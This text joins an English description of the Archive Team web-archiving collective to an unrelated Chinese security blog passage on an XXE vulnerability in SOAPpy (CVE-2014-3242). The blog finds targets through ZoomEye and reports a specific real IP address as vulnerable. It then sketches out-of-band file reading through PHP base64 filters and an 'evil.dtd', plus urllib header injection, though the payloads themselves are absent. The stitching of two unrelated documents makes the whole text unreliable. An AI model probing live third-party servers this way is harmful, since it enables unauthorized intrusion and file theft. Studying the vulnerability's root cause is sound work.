
Formed in 2009, the Archive Team (not to be confused with the archive.org Archive-It Team) is a rogue archivist collective dedicated to saving copies of rapidly dying or deleted websites for the sake of history and digital heritage. The group is 100% composed of volunteers and interested parties, and has expanded into a large amount of related projects for saving online and digital history.
History is littered with hundreds of conflicts over the future of a community, group, location or business that were "resolved" when one of the parties stepped ahead and destroyed what was there. With the original point of contention destroyed, the debates would fall to the wayside. Archive Team believes that by duplicated condemned data, the conversation and debate can continue, as well as the richness and insight gained by keeping the materials. Our projects have ranged in size from a single volunteer downloading the data to a small-but-critical site, to over 100 volunteers stepping forward to acquire terabytes of user-created data to save for future generations.
The main site for Archive Team is at archiveteam.org and contains up to the date information on various projects, manifestos, plans and walkthroughs.
This collection contains the output of many Archive Team projects, both ongoing and completed. Thanks to the generous providing of disk space by the Internet Archive, multi-terabyte datasets can be made available, as well as in use by the Wayback Machine, providing a path back to lost websites and work.
Our collection has grown to the point of having sub-collections for the type of data we acquire. If you are seeking to browse the contents of these collections, the Wayback Machine is the best first stop. Otherwise, you are free to dig into the stacks to see what you may find.
The Archive Team Panic Downloads are full pulldowns of currently extant websites, meant to serve as emergency backups for needed sites that are in danger of closing, or which will be missed dearly if suddenly lost due to hard drive crashes or server failures.
来源
在研究xxe漏洞时,发现乌云镜像上的一个洞来源于CVE-2014-3242
SOAPpy <= 0.12.5时存在XXE漏洞,上zoomeye随便搜索一下:
测试
123.126.42.100确实存在XXE,再来测试读取文件,使用这里的方法
可以看出并不能实现显示文件,因为不知道显示的函数到底是什么。
php xxe 测试
在测试这个XXE的过程中,使用了vulhub的php_xxe进行了php相关xxe的测试,在这里做一些扩展:
很多造成xxe的库,在发送请求会检查一遍请求的url是否合法,如果不合法的话,会发生错误
要是没有任何正常显示,但是能够整出错误提示的话,也算是可以读取文件的。为了解决这个问题,要是php的话,php支持filter等伪协议可以将读取到的文件转换格式,比如base64编码,之后请求
其中
evil.dtd文件内容别的语言如何实现这个功能,我还不知道。
延伸
细看一下请求的
urllib的版本,查看是python urllib/1.6,查询一下发现urllib存在http头注入,具体可以看这里测试结果

发现同样存在
http头注入,但是因为对于请求是否成功,没有办法知道,所以有洞也没法做太多东西。做进一步延伸,到底soappy为什么会产生这个漏洞,查看SOAPpy源码发现其是使用
xml.sax这种方式来解析xml的查找
xml.sax这种解析xml方式发现原来是因为soappy使用了该种解析xml的方式导致了xxe